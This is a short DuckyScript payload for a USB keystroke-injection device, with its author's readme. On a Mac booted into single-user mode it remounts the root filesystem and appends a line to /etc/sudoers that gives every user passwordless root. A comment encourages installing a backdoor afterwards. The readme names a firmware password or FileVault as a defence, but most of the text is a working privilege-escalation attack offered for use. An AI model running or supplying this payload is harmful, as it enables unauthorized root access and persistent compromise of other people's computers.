Author: Jesse Wallace (@c0deous)
This script adds a line into /etc/sudoers that enables sudo for ALL users without requiring a password. Only requirement is a reboot into single user mode.
Setup a firmware password or enable FileVault disk encryption.
This method was tested on macOS 10.7.5, 10.11, 10.12 but should work for all versions. (?)
REM MacOS AllSudo
REM Enables Sudo access for all users without a password
REM First boot the machine into single user mode -
REM By Jesse Wallace (@c0deous)
DELAY 1000
STRING mount -uw / && chmod 755 /etc/sudoers && echo 'ALL ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers && chmod 440 /etc/sudoers && shutdown -h now
REM Now would be a great time to install a backdoor. Ez root ;3
REM TODO Use visudo for edits (unconfirmed if working)
Todo: Having issues scripting a way to boot into single user mode with the duck. If you'd like to help please DM me on Twitter (@c0deous)